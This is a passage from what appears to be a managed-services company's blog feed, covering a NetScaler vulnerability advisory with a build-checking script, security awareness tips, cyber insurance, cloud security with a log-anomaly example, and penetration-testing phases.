A proactive stance is always better than a reactive one. While staying informed and keeping systems updated is essential, having robust defenses in place is equally crucial. Think of these defenses as the walls of a digital fortress designed to keep intruders at bay. From multi-layered authentication methods to strong passwords and robust antivirus measures, here’s how you can fortify your digital defenses:

  • Embrace Multi-Factor Authentication (MFA)

    • Extra Layer – MFA requires two or more verification methods. These methods often consist of something you know (password), something you have (a phone) or something you are (fingerprint).
    • Deterrence – MFA can prevent unauthorized access even if a hacker gets your password.
  • Strengthen Passwords

    • Complexity is Key – Use a mix of uppercase, lowercase, numbers, and symbols. Creating passphrases is a helpful way to ensure length and complexity are accounted for while remaining memorable for the user.
    • Avoid Common Mistakes – Never use easily guessable passwords like “password123” or “admin.”
    • Use a Password Manager – These tools generate and store complex passwords for you, reducing the risk of breaches.
  • Invest in Antivirus Software

    • Real-time Protection – Good antivirus software monitors your system in real-time, catching threats before they can do substantial harm.
    • Regular Scans – Schedule weekly or daily scans to ensure no malware has slipped through.

Your Trusted Cyber Vigilance Ally

Cyber vigilance is always necessary, but its importance during turbulent times cannot be overstated. While global events capture our attention, it’s essential to remember that our digital spaces require consistent protection. We boost digital safety by staying informed, maintaining vigilance and applying best practices. Especially during challenging periods, a dedicated approach to online security is crucial to prevent potential threats and maintain the integrity of digital interactions.

Choosing the right security partner is pivotal. Whether you’re looking to strengthen cybersecurity measures, enhance IT infrastructure or explore new digital solutions, OneNeck is here to support and guide you.

Don’t compromise on digital security. Contact us today; together, we’ll help ensure a robust and secure digital experience.

Critical Security Vulnerability for NetScaler ADC and NetScaler Gateway https://www.oneneck.com/blog/critical-security-vulnerability-for-netscaler-adc-and-netscaler-gateway/ Thu, 12 Oct 2023 15:00:51 +0000

On October 10, 2023, Citrix released a security bulletin concerning the discovery of two critical vulnerabilities. This announcement highlighted vulnerabilities in their flagship products: NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly known as Citrix Gateway). These vulnerabilities are particularly concerning as, if successfully exploited, they could compromise the integrity and security of systems and data. Specifically, the vulnerabilities could lead to:

  • CVE-2023-4966: Sensitive information disclosure
  • CVE-2023-4967: Denial of service

NetScaler CVE ID chart (source: Citrix)

Affected NetScaler Versions

The following versions of NetScaler ADC and NetScaler Gateway are affected:

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC 13.1-FIPS before 13.1-37.164
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

These vulnerabilities do not directly impact customers utilizing Citrix-managed cloud services or Citrix-managed Adaptive Authentication, and, as such, no immediate action is required.

Another important item to note is that NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and remains vulnerable.
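As an added example (not from Citrix or the original post), the following Python helper compares an inventory of NetScaler builds against the fixed builds listed above and flags the standard 12.1 release as EOL with no fix. It assumes version strings written in the bulletin’s MAJOR.MINOR-BUILD.SUBBUILD notation (for example 13.1-49.15), with the FIPS/NDcPP variant passed separately; the sample inventory is constructed for illustration.

```python
"""Assess NetScaler ADC / Gateway builds against the fixed builds in the
October 2023 Citrix bulletin (CVE-2023-4966, CVE-2023-4967)."""
import re
from typing import Dict, List, Tuple

# Fixed builds from the bulletin, keyed by (release, variant).
# variant is "" for standard ADC/Gateway builds and "FIPS" or "NDcPP" for
# the special ADC builds. Standard 12.1 is End-of-Life and has no fixed build.
FIXED_BUILDS: Dict[Tuple[str, str], Tuple[int, int]] = {
    ("14.1", ""):      (8, 50),
    ("13.1", ""):      (49, 15),
    ("13.0", ""):      (92, 19),
    ("13.1", "FIPS"):  (37, 164),
    ("12.1", "FIPS"):  (55, 300),
    ("12.1", "NDcPP"): (55, 300),
}
EOL_RELEASES = {"12.1"}  # standard 12.1: vulnerable, no patch available

# Bulletin notation: MAJOR.MINOR-BUILD.SUBBUILD, e.g. "13.1-49.15"
_VERSION_RE = re.compile(r"^(\d+\.\d+)-(\d+)\.(\d+)$")


def parse_version(version: str) -> Tuple[str, Tuple[int, int]]:
    """Split '13.1-49.15' into ('13.1', (49, 15)).

    Build numbers are compared as integers, not strings: 14.1-8.9 is
    older than 14.1-8.50 even though "8.9" sorts after "8.50" as text.
    """
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised NetScaler version string: {version!r}")
    release, build, sub = match.groups()
    return release, (int(build), int(sub))


def assess(version: str, variant: str = "") -> str:
    """Classify one build as 'patched', 'vulnerable', 'eol-vulnerable'
    or 'unknown-release' (a release the bulletin does not list)."""
    release, build = parse_version(version)
    fixed = FIXED_BUILDS.get((release, variant))
    if fixed is not None:
        return "patched" if build >= fixed else "vulnerable"
    if variant == "" and release in EOL_RELEASES:
        return "eol-vulnerable"
    return "unknown-release"


def assess_inventory(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str]]:
    """Return (hostname, status) for an inventory of (hostname, version, variant)."""
    return [(host, assess(version, variant)) for host, version, variant in inventory]


# Constructed sample inventory (hostnames and builds are made up).
SAMPLE_INVENTORY = [
    ("gw-edge-01", "13.1-48.47", ""),       # below 13.1-49.15 -> vulnerable
    ("gw-edge-02", "13.1-49.15", ""),       # exactly the fixed build -> patched
    ("adc-core-01", "14.1-8.9", ""),        # 8.9 < 8.50 numerically -> vulnerable
    ("adc-fips-01", "13.1-37.164", "FIPS"), # fixed FIPS build -> patched
    ("adc-legacy-01", "12.1-65.39", ""),    # standard 12.1 is EOL -> eol-vulnerable
]

if __name__ == "__main__":
    for host, status in assess_inventory(SAMPLE_INVENTORY):
        print(f"{host:14} {status}")
```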

For more detailed information, please refer to the official Citrix security bulletin on the Citrix Knowledge Center.

Recommended Action

In light of these recent discoveries, OneNeck cannot emphasize enough the importance of timely action. We strongly urge all affected customers to prioritize the installation of the updated versions of NetScaler ADC and NetScaler Gateway. By doing so, you can ensure your systems’ continued security and integrity, safeguarding them against potential exploits.

We have some reassuring news for our valued customers utilizing OneNeck’s managed services. We’ve already initiated contact and are actively supporting you in addressing these vulnerabilities. Rest assured, we’re on top of this situation to ensure your systems remain secure.

OneNeck’s Commitment to Customer Security

At OneNeck, we prioritize the security of our customers. We understand the complexities and challenges of managing and updating IT infrastructure. Beyond these immediate concerns, we also offer Citrix Assurance Services as well as comprehensive patch management to ensure long-term system security and stability. As a trusted partner, we stand ready to help any customer needing support, whether for installing the necessary patches or for broader IT management solutions.

Additionally, we invite you to check out our Monthly Patching Blog series. It’s a valuable resource to keep you informed on the latest critical updates from our vendors, ensuring you’re always ahead of potential threats.

If you require assistance or have any concerns, please contact our Customer Care Center. Our team is ready and available to guide you through the update process and beyond, ensuring your systems remain secure and resilient.

Cybersecurity Awareness Month: Simple Steps for Staying Safer Online https://www.oneneck.com/blog/cybersecurity-awareness-month-simple-steps-for-staying-safer-online/ Fri, 06 Oct 2023 14:20:09 +0000

October is more than just the month of fall foliage and Halloween; it’s a period that has, for the past two decades, been dedicated to cybersecurity. As we mark the 20th Cybersecurity Awareness Month, it’s clear that, with the increasing volume and sophistication of cyberattacks, cybersecurity and awareness of it are just as important today, if not more so. The collaborative efforts of governmental agencies and those in the tech industry underscore the imperative of ensuring individuals and businesses remain secure.

Cybersecurity Awareness Month: A Two-Decade Journey

Cybersecurity Awareness Month was established when our digital landscape looked quite different. Following the tragic events of 9/11, government agencies and tech industry leaders collectively recognized the critical need for digital safety. Organizations including the Department of Homeland Security (DHS), the White House, and tech leaders such as Microsoft, Amazon, Cisco and others joined together to educate the public on the necessity of safe technology usage. This effort gave birth to Cybersecurity Awareness Month. This campaign has evolved over the years to be co-managed by the National Cybersecurity Alliance (NCA) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

In its first year, the primary advice of Cybersecurity Awareness Month was straightforward: change passwords in tandem with smoke detector battery replacements. While this was a practical starting point, the digital landscape has evolved dramatically. With the rise in volume and sophistication of cyberattacks, such simplistic advice is no longer sufficient. The nature of threats has shifted from mere password breaches to advanced persistent threats, ransomware attacks, and sophisticated phishing schemes. The goals and recommendations have matured over the years, reflecting the complexities of today’s cyber threats.

With that said, one of the primary objectives of Cybersecurity Awareness Month is to let users know that being safer does not need to be overly complicated or arduous. Rather, by adding a handful of simple actions to our daily routines, we can all become significantly safer whenever we are online.

2023 Cybersecurity Awareness Month banner (image source: cisa.gov)

Everyday Actions for Cybersecurity Awareness Month

Awareness is undeniably the foundation of digital safety. However, it’s the actions we take, based on that awareness, that truly determine our security in the digital realm. This year’s theme from CISA, “Secure Our World,” is a firm reminder, emphasizing our collective role in fortifying the digital space. Let’s delve deeper into the four actions highlighted by the campaign:

Use Strong Passwords

In today’s digital age, where data breaches have unfortunately become commonplace, the significance of using robust passwords cannot be overstated. A strong password is the first line of defense against potential cyber threats. But what constitutes a strong password? In a post from earlier this year, OneNeck’s Security Specialist, Nick Santilli, states that ideally, it should be a combination of letters (uppercase and lowercase), numbers and special symbols, making it difficult for cybercriminals to guess or crack. He further recommends that instead of passWORDS, think more in terms of passPHRASES. Passphrases are typically longer than passwords and, therefore, harder to crack.

Moreover, with the plethora of online accounts most of us manage, remembering unique passwords for each can be daunting. This need for password organization is where password managers come into play. These tools store your passwords securely and generate strong, random passwords for your accounts.

Enable Multi-Factor Authentication (MFA)

While a strong password is crucial, it’s not infallible. Cybercriminals have developed methods to compromise even the most complex passwords. This need to supplement the protection offered by login credentials is where Multi-Factor Authentication (MFA) steps in.

As mentioned in our March blog, To MFA or Not to MFA – It’s Not Really a Question Anymore, MFA requires users to provide two or more verification factors to access an account, making unauthorized access incredibly challenging. This validation could be something you know (password), something you have (a phone or hardware token), or something you are (fingerprint or facial recognition). By adding this additional layer of security, even if an attacker manages to steal your password, they won’t be able to access your account without the second verification factor.

Recognize and Report Phishing

Phishing attacks are the most common form of cybercrime. Cybercriminals craft seemingly legitimate emails, messages or websites to deceive individuals into providing sensitive data, such as personally identifiable information, banking details or login credentials. It’s imperative to be discerning and vigilant. For organizations, educating and training employees is essential. One particularly effective method to train and test is using simulated phishing attacks.

While organizations can employ training methods, individuals must also be vigilant in recognizing and responding to potential threats. Always verify the source before clicking on any links or downloading attachments. Look for telltale signs of phishing, such as generic greetings, spelling errors or suspicious email addresses. Trust your instincts and avoid interacting with the message if something seems amiss. Moreover, reporting suspicious activity is fundamental in curbing such threats and ensuring that others are warned quickly.

Regularly Update Software

The digital landscape is dynamic, with cyber threats constantly evolving. To counter these threats, software developers regularly release updates that patch known vulnerabilities. Keeping your software updated, be it your operating system, applications or antivirus, protects against the latest known threats.

Auto-updates are one option for keeping software current. Still, they might not always be feasible for organizations due to compatibility issues, work schedules or other business requirements. In such cases, investing in patch management becomes crucial. Patch management ensures that updates and patches are prioritized and applied promptly, offering a structured approach to maintaining software security.

OneNeck: Your Partner for Cybersecurity Awareness Month and Beyond

At OneNeck, our core values resonate deeply with the goals of Cybersecurity Awareness Month. While security might be intricate for professionals, we understand that it should be accessible and straightforward for everyone else. Simple measures such as MFA, password managers and cybersecurity education (like recognizing phishing scams) can significantly enhance digital security for your business.

Take action this Cybersecurity Awareness Month. Partner with OneNeck, and let’s work together to fortify your digital defenses, ensuring a safer and more secure online environment for your business.

Cyber Insurance: Simple Steps for Preparation https://www.oneneck.com/blog/cyber-insurance-simple-steps-for-preparation/ Tue, 03 Oct 2023 14:48:04 +0000

Cybersecurity is a critical concern for organizations worldwide. As businesses increasingly rely on networked technologies, potential risks and vulnerabilities have escalated. Consequently, cyber insurance has become a vital tool in the risk management strategy of many organizations. In this blog, we delve into cyber insurance, highlighting its necessity, the challenges in acquiring it and strategies to secure better rates and coverage.

The Growing Need for Cyber Insurance

Cyber insurance serves as a safety net, helping organizations mitigate the financial and operational repercussions of cyber threats like ransomware. However, many businesses are at a crossroads, unsure of what policies to obtain or if insurers will even underwrite their risk.

Recent research underscores the growing perception among organizations that ransomware poses a significant threat to their viability. Despite increased awareness and dedicated efforts to counter these threats, a mere 15% of companies have adopted active cyber insurance policies, as the Enterprise Strategy Group (ESG) reported.

Challenges in Acquiring Cyber Insurance

While it stands to reason that obtaining cyber insurance should be a straightforward process, given its importance for most organizations, the actual experience tells a different story. Organizations frequently encounter a series of obstacles in pursuing cyber insurance. These hurdles, including soaring premium rates and rigid underwriter requirements, add layers of complexity to the acquisition process.

A notable 56% of IT and security leaders find it challenging to navigate these hurdles, highlighting the need for expert guidance to facilitate a smooth policy acquisition process. Let’s examine the primary challenges organizations face:

Escalating Rates

  • Surge in Premium Rates: The cyber insurance market is experiencing a significant premium rate increase. This surge is primarily attributed to the growing frequency and severity of cyber-attacks, which have heightened the risk factors associated with providing coverage.
  • Market Dynamics: The dynamics of the insurance market, influenced by global economic factors and regulatory changes, also play a crucial role in the escalation of rates. Organizations need to stay abreast of these dynamics to negotiate better terms.

Coverage Limitations

  • Restricted Scope of Protection: Organizations often find that the coverage offered by cyber insurance policies is limited, restricting the scope of protection and leaving them vulnerable to uncovered threats under standard policy terms.
  • Customization Challenges: Tailoring a policy to suit an organization’s unique needs and risk profile can be complicated. It requires a deep understanding of the potential risks and the ability to negotiate terms that offer comprehensive protection.

Meeting Underwriter Requirements

  • Comprehensive Cybersecurity Assessment: Meeting the stringent requirements set by underwriters is a significant hurdle. This process often entails a detailed assessment of the organization’s cybersecurity posture, including evaluating the attack surface and the effectiveness of the existing security measures.
  • Demonstrating a Robust Security Program: Organizations must show a robust security program encompassing vulnerability management and a well-functioning security operations function. This presentation assures underwriters of their preparedness to mitigate potential cyber threats.

What Companies Need to Know

Navigating cyber insurance requires a solid understanding of your company and the insurance landscape. The first step is a comprehensive self-assessment to gauge your company’s cybersecurity posture. This process helps identify the strengths and weaknesses of your existing cybersecurity measures, allowing you to opt for coverage that aligns precisely with your company’s needs. It is vital to avoid succumbing to the pressure of accepting terms or add-ons that do not mesh with your business operations.

Understanding the terminology and nomenclature used in the cyber insurance sector is equally important. This knowledge enables communication of your needs and empowers you to negotiate terms that serve your company’s best interests. Keeping abreast of trends and dynamics in the cyber insurance market is crucial and includes understanding insurance companies’ evaluation of potential clients.

It’s worth noting that the cyber insurance industry operates with considerable flexibility due to a lack of stringent regulations, allowing insurers significant leeway in setting terms and conditions. This freedom grants insurers substantial discretion in determining policy coverage and associated costs.

Strategies to Secure Better Cyber Insurance Rates and Coverage

It’s no secret that companies seek ways to snag better deals and broader coverage from their cyber insurance policies. Let’s walk through some key strategies that can serve as an outline for securing an approach that is both economically viable and comprehensive:

  • Collaborative Assessment and Action Planning: Organizations must engage in a collaborative security assessment process to secure better rates and coverage. This involves working closely with managed service providers like OneNeck, who guide IT and security leaders through meticulously evaluating the current environment and identifying gaps. This assessment culminates in a proposed action plan that bolsters security measures and streamlines the process.
  • Leveraging Managed Detection and Response (MDR) Services: Increasing numbers of organizations recognize the importance of utilizing Managed Detection and Response (MDR) services as a vital step in meeting the prerequisites for cyber insurance. Engaging with MDR providers not only helps fulfill the requirements but also strengthens the security program, enhancing the organization’s credibility and standing in the eyes of insurers.
  • Building a Tailored Security Program: Every organization has a unique infrastructure and risk profile. Hence, adopting a one-size-fits-all approach to cybersecurity isn’t viable. Organizations must strive to build a security program that aligns with their environment, operating model and risk profile. This process involves understanding the attack surface, assessing external assets that add risk and implementing preventative security controls.
  • Incident Response (IR) Planning: IR planning is a core activity that prepares organizations to respond effectively to cyber incidents. It encompasses a range of strategies and processes designed to mitigate the impact of cyber-attacks and ensure swift recovery. Moreover, if your company has encountered security breaches, it might influence policy eligibility and the cost. Being prepared to showcase the measures implemented to mitigate future risks can be a strong bargaining point.

Partnering with Experts for a Secure Future

Navigating the complex world of cyber insurance requires a proactive and achievable cyber defense plan. Organizations must focus on building continuous processes supported by automated tools to meet the dynamic demands of the cyber landscape. Moreover, partnering with experts like OneNeck can facilitate a seamless journey towards securing a robust cyber insurance policy, ensuring you are well-prepared to face the evolving cyber threats head-on.

To further empower your organization, we invite you to watch our insightful webinar, “Take the Driver’s Seat from Your Cyber-Insurance Underwriter.” This session, led by OneNeck industry experts, will provide you with the knowledge and tools to confidently navigate the complex landscape of cyber insurance. The webinar is available on demand, allowing you to access this valuable information at your own pace and convenience.

Contact us today to strengthen your cybersecurity posture and find the best cyber insurance solutions tailored to your needs. Our expert team is here to guide you every step of the way, ensuring a safer and more secure digital journey ahead.

Take the first step towards a proactive and fortified cyber defense strategy today.

Cloud Security 101: Strengthening Security in the Digital Sky
https://www.oneneck.com/blog/cloud-security-101-strengthening-security-in-the-digital-sky/
Fri, 22 Sep 2023 15:58:48 +0000 (https://www.oneneck.com/?p=5585)

The cloud’s vast potential is undeniable, but it also introduces a unique set of challenges that require specialized expertise. Understanding and implementing robust security measures becomes crucial as organizations transition from traditional on-premises infrastructures to cloud-based and hybrid systems.

Harnessing the Cloud: Opportunities and Obstacles

Cloud computing has significantly changed the way companies operate, offering a range of benefits that cater to modern needs. One of its primary advantages is scalability and flexibility: the cloud can adjust to varying demand, whether for a small startup or a large enterprise. This adaptability means resources are consumed on an as-needed basis, often reducing the need for large upfront investments in infrastructure, and capacity can scale up or down as the business grows or changes.

Traditional IT setups involve high initial costs, from procuring hardware to establishing and maintaining data centers. In contrast, cloud computing introduces a more flexible financial model, shifting capital expenses to operational ones. Organizations can better manage their budgets, paying only for the resources they use. This provides financial flexibility and reduces reliance on physical hardware, allowing businesses to adapt quickly to changing needs without being bogged down by legacy systems.

Cloud computing facilitates global collaboration, allowing teams worldwide to work together in real-time and access shared resources and tools. Additionally, businesses can effectively reach global markets, serving clients from any location. However, this accessibility also presents challenges; every access point in the cloud can be a potential vulnerability, underscoring the importance of robust security measures.

Shared Responsibility in Cloud Security

In cloud computing, the concept of “shared responsibility” is paramount. It delineates security obligations between the cloud service provider and the user. While the provider is typically responsible for the underlying infrastructure and ensuring the cloud platform’s security, the user is tasked with safeguarding their data and applications.

Encryption, for instance, becomes a collaborative effort: the provider may offer the tools, but users must implement and manage them (choosing what to encrypt, and holding and rotating the keys). Understanding and embracing this shared model is crucial for adequate cloud security, as it underscores the idea that security is a joint effort, requiring vigilance from both the provider and the user.

However, shared responsibility doesn’t end with technical measures. It extends to regulatory compliance and best practices. Standards such as NIST, HIPAA and CIS Controls serve as security and data protection benchmarks. These standards represent legal obligations and set the foundation for trust and ethical data handling. By aligning with these recognized standards, consumers and providers can ensure they meet the highest security benchmarks, further strengthening their collaborative defense against potential threats.

Network Security: A Multi-Layered Approach

Let’s visualize a secure cloud environment as a fortress designed with multiple layers of defense to deter potential threats. Firewalls are the primary gatekeepers, monitoring and controlling incoming and outgoing network traffic based on predetermined security policies. Intrusion Detection Systems (IDS) continuously scan for suspicious activities or policy violations, serving as vigilant sentinels that alert administrators to potential threats.

Inside the network, internal security measures are vital. Techniques like micro-segmentation create isolated environments, ensuring a breach in one segment doesn’t jeopardize the entire system. Intrusion Prevention Systems (IPS) don’t just detect threats; they actively block malicious activities, maintaining the network’s resilience against cyberattacks. Additionally, regular vulnerability assessments highlight weaknesses, allowing for timely remediation.

IAM: Beyond Simple Permissions

Identity and Access Management (IAM) extends beyond the basic premise of granting or denying access. At its core, IAM is a holistic approach to managing digital identities, ensuring that the right individuals access the right resources at the right times and for the right reasons.

Understanding user behavior is pivotal in this process. IAM systems can continuously monitor and analyze user activity and detect patterns and anomalies that might indicate a security threat. Anomalies are not only about the timing of access: a user reading high-value data or making bulk data transfers that are not part of their usual tasks can also be flagged.

Furthermore, IAM systems can take proactive measures such as enforcing multi-factor authentication (MFA). MFA requires the user to present two or more verification factors to gain access. This adds an extra layer of security: even if a malicious actor holds valid login credentials, they still need the second factor, which makes unauthorized access significantly more difficult.
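The behavioral monitoring described above is easier to reason about with a concrete baseline-and-flag loop. The following is an added illustration, not code from the original post or from any OneNeck or vendor product: it builds a per-user baseline (usual hours, resources touched, median transfer size) from constructed sample access logs, then flags new events that fall outside that baseline. The log format, the `HIGH_VALUE` resource set and the `BULK_FACTOR` threshold are assumptions chosen for the example.

```python
"""Flag anomalous access events against a per-user baseline (constructed example)."""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample log lines (timestamp, user, resource, bytes transferred). Not real traffic.
BASELINE_LOG = """\
2024-03-04T09:12:00 alice crm/reports 120000
2024-03-04T10:40:00 alice crm/reports 98000
2024-03-05T09:30:00 alice crm/contacts 150000
2024-03-05T14:05:00 alice crm/reports 110000
2024-03-04T08:50:00 bob hr/payroll 40000
2024-03-05T09:10:00 bob hr/payroll 45000
2024-03-05T11:20:00 bob hr/policies 12000
"""

# Constructed events to score against the baseline.
NEW_LOG = """\
2024-03-06T10:00:00 alice crm/reports 105000
2024-03-06T02:45:00 alice crm/reports 100000
2024-03-06T11:15:00 alice hr/payroll 20000
2024-03-06T15:00:00 bob hr/payroll 900000
"""

HIGH_VALUE = {"hr/payroll"}  # resources that always deserve extra scrutiny (assumed set)
BULK_FACTOR = 5              # transfers above 5x the user's median count as bulk (assumed threshold)


def parse_events(text):
    """Parse the simple whitespace-separated log format used in this example."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, resource, nbytes = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "resource": resource, "bytes": int(nbytes)})
    return events


def build_baseline(events):
    """Per user: hours seen, resources seen, and median bytes per access."""
    by_user = defaultdict(lambda: {"hours": set(), "resources": set(), "bytes": []})
    for e in events:
        b = by_user[e["user"]]
        b["hours"].add(e["ts"].hour)
        b["resources"].add(e["resource"])
        b["bytes"].append(e["bytes"])
    return {u: {"hours": b["hours"], "resources": b["resources"],
                "median_bytes": median(b["bytes"])} for u, b in by_user.items()}


def flag_anomalies(events, baseline):
    """Return (user, timestamp, resource, reasons) for every event that deviates from baseline."""
    flagged = []
    for e in events:
        b = baseline.get(e["user"])
        reasons = []
        if b is None:
            reasons.append("no baseline for user")
        else:
            lo, hi = min(b["hours"]), max(b["hours"])
            # One hour of slack either side of the user's observed working window.
            if not (lo - 1 <= e["ts"].hour <= hi + 1):
                reasons.append("outside usual hours")
            if e["resource"] in HIGH_VALUE and e["resource"] not in b["resources"]:
                reasons.append("first access to high-value resource")
            if e["bytes"] > BULK_FACTOR * b["median_bytes"]:
                reasons.append("bulk transfer")
        if reasons:
            flagged.append((e["user"], e["ts"].isoformat(), e["resource"], reasons))
    return flagged


def run():
    """Build the baseline from BASELINE_LOG and score NEW_LOG against it."""
    baseline = build_baseline(parse_events(BASELINE_LOG))
    return flag_anomalies(parse_events(NEW_LOG), baseline)


if __name__ == "__main__":
    for user, ts, resource, reasons in run():
        print(f"{ts} {user} {resource}: {', '.join(reasons)}")
```

In this constructed data the normal 10:00 report access is left alone, the 02:45 access is flagged on timing, the first payroll read by a non-HR user is flagged on resource, and the 900 KB payroll pull is flagged on both timing and size. A real deployment would feed the same three signals (time, resource sensitivity, volume) from the identity provider's audit log and tune the slack and threshold per role.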

Proactive Defense: More than Just Monitoring

Managing vulnerabilities is an obvious cornerstone of cloud security. However, the reactive nature of traditional antivirus software, which recognizes only threats it has already seen, can no longer keep up with the sophisticated and agile nature of modern attacks.

Regular assessments and penetration tests help identify and address potential weak spots before attackers can exploit them. It’s crucial to have an efficient patch management system in place, ensuring that vulnerabilities are dealt with swiftly.

As businesses increasingly adopt container and microservices architectures, the need for security intensifies. It is essential to integrate protective measures from the development stage and maintain them throughout the software’s lifecycle. By proactively managing vulnerabilities, organizations can reduce the window of opportunity for potential exploits. This proactive stance protects applications and data and fosters a culture of ongoing vigilance, a necessity in an environment where threats can emerge unpredictably.

The Human Element of Cloud Security

While advanced tools and protocols are indispensable, the human element is pivotal. It’s a common misconception that most security breaches are solely due to technological vulnerabilities. Human error or oversight often serves as the gateway for cyberattacks. Without the proper knowledge, employees can inadvertently become the weakest link, falling prey to sophisticated phishing attacks or unintentionally mishandling sensitive data.

Recognizing this, organizations must invest in continuous cybersecurity education. Regular training sessions, enriched with the latest threat intelligence, equip employees with the skills to discern potential threats. Security Awareness Training on identifying phishing emails, safe browsing practices, and secure password management can transform employees from potential security risks to vigilant watchdogs.

Choosing a Cloud Service Partnership

Selecting the right Cloud Service Provider (CSP) is a critical decision. Your CSP needs to be much more than a vendor; they are integral to your organization’s security posture. It’s not just about the tools and features they offer but also about their approach to security as a whole.

When considering a CSP, it’s essential to delve into its security philosophy. Questions to ponder include: How frequently do they undergo security audits? How swiftly do they respond to identified threats? A reputable CSP will be forthright about its security protocols, past incidents and remediation measures. This transparency ensures that you’re not just choosing a service but entering into a partnership built on trust and mutual security goals.

Navigating Cloud Security with OneNeck

In the evolving landscape of modern cloud computing, businesses are presented with unparalleled opportunities and inherent challenges. As organizations leverage the cloud’s capabilities, the significance of robust security becomes increasingly evident. A comprehensive approach to cloud security, which integrates technology, processes, and the human element, is essential for a confident and risk-mitigated digital transition.

At OneNeck, we pride ourselves on being more than just a provider of technical services. With extensive expertise in cloud solutions, we offer a partnership built on trust, experience and dedication. As a leading Cloud Service Provider, we prioritize proactive security measures and have a deep understanding of the evolving threat landscape.

As you consider your next steps in the cloud domain, let our experience and expertise guide you. Contact us today to ensure your cloud endeavors are both innovative and secure.

Importance of Penetration Testing in Cybersecurity
https://www.oneneck.com/blog/importance-of-penetration-testing-in-cybersecurity/
Thu, 14 Sep 2023 21:03:29 +0000 (https://www.oneneck.com/?p=5540)

Uncover Security Gaps with Proactive Pen Tests

The battle of cybersecurity is more of a game of chess than a warzone. As our reliance on digital platforms intensifies, so does the sophistication of attacks. And as cyber-attacks become more intelligent, our cybersecurity technology evolves in hopes that we can stay ahead of malicious actors before they access digital assets and personally identifiable information (PII).

But is it enough? Even with incredibly thorough security measures, there are still likely to be holes in any company’s attack surface. The only way to plug them is to find them—and the only way to find them is to use penetration testing.

What is penetration testing?

Penetration testing is a deliberate and approved cyber-attack on a computer system, carried out to assess and improve the security of the system.

Unlike actual cyber attacks, which aim to exploit systems for malicious intent, pen tests are conducted to identify vulnerabilities and weaknesses before bad actors do. These tests provide invaluable insights into potential attack vectors, enabling organizations to bolster their defenses and ensure data remains safe.

What are the types of pen testing?

Each type of penetration test offers important approaches to proactively find and address potential vulnerabilities. No test is fully comprehensive, so a mix of different types of tests is the best way to ensure a comprehensive review of your cybersecurity posture. Let’s explore these distinct methodologies.

  • Black Box Testing: Here, the tester has no prior knowledge of the target system, mimicking the approach of real-world attackers who have no internal knowledge of the system.
  • White Box Testing: Testers have full knowledge of the system’s architecture and source code. This approach is exhaustive and helps identify vulnerabilities deep within the system.
  • Gray Box Testing: A middle ground between black and white box testing, testers have partial knowledge of the system. This testing is efficient in highlighting vulnerabilities from both internal and external perspectives.
  • Red Team Testing: A dynamic approach where a group of ethical hackers simulate real-world cyber-attacks to test an organization’s detection and response capabilities.
  • Blue Team Testing: Opposite to red teaming, blue team testing focuses on defense. Blue teams defend against simulated attacks and hone their incident response strategies.

Benefits of penetration testing

On average, 57% of attackers can complete an end-to-end attack in less than a day. While the basic benefit of pen testing is clear—uncovering vulnerabilities before they are exploited by malicious actors—there are many reasons why pen testing is valuable.

  • Simulates real-world attack scenarios, giving an authentic picture of potential security breaches.
  • Maintains compliance with regulations to avoid potential legal consequences.
  • Demonstrates a commitment to security, which increases customer trust.
  • Saves significant costs that might come from ransom payments, data loss, legal implications, penalties and lost business.
  • Ensures that an organization’s defenses adapt and grow in tandem, always a step ahead of potential attackers.

The 5 phases of pen testing

The process of penetration testing is typically divided into five sequential phases. Each phase ensures your approach to testing is methodical, enabling you to identify security gaps so you can improve your security posture. Here are the five phases of penetration testing:

Pen Test Phase 1: Planning and Reconnaissance

Before the actual test, the objectives, scope and methods of the test are defined. This phase includes determining the systems to be tested and establishing the boundaries of the test.

From there, the tester begins reconnaissance by gathering as much information as possible about the target system. This could involve identifying IP addresses, domain details and network services. The idea is to find potential entry points and understand the system’s architecture.

Pen Test Phase 2: Scanning

This phase aims to identify how the target system will respond to various intrusion attempts. Testers can use tools and methods to detect vulnerabilities both statically (by analyzing application code) and dynamically (by evaluating the system while it’s running).

Pen Test Phase 3: Gaining Access

Now, testers try to exploit the identified vulnerabilities. This means they’ll attempt to hack into the system, mimicking potential real-world attacks. This phase demonstrates what type of data could be accessed or stolen from a successful breach.

Pen Test Phase 4: Maintaining Access

This phase simulates what cyber attackers do after they’ve breached a system. The goal is to understand if the system can detect and resist prolonged unauthorized presence. Testers attempt to create a “backdoor” for themselves, emulating how malware might operate to stay undetected within a compromised system.

Pen Test Phase 5: Analysis

Post-testing, this phase is all about documentation and feedback. A detailed report is generated, outlining vulnerabilities discovered, data accessed, methods used and the duration of the testers’ unnoticed presence in the system. The report also typically includes recommendations for securing the identified vulnerabilities, providing organizations with actionable insights to bolster their defenses.

Penetration Testing with OneNeck

Penetration testing is an important part of OneNeck’s suite of cybersecurity solutions. Our real-world risk assessment includes the execution of full-scope Red Team exercises, mimicking tactics and techniques employed by even the most recent threats. These tests go well beyond a standard checklist, revealing business-specific risks present in your network and infrastructure.

With OneNeck, you can keep moving forward because we’ve got your back. Learn more about our penetration testing solution or reach out for a free quote.

What is Endpoint Security and How Does it Work?
https://www.oneneck.com/blog/what-is-endpoint-security-how-does-it-work/
Thu, 03 Aug 2023 14:49:47 +0000 (https://www.oneneck.com/?p=5222)

Endpoint Security is Essential to Protecting Your Network and Your Remote Workforce

You may not realize it, but one of the biggest threats to your network could be lurking in a coffee shop or someone’s pocket. Today, 70% of breaches originate on endpoints like desktops, laptops, mobile phones or tablets. Endpoint security is essential to protecting your organization’s network and data from threats and malicious attacks.

The Evolution of Endpoint Security

It used to be that all of your network users sat in the same building and used the same computers to access on-premises data. All you needed to protect your network was a simple antivirus program that could detect known threats.

That’s not the case anymore.

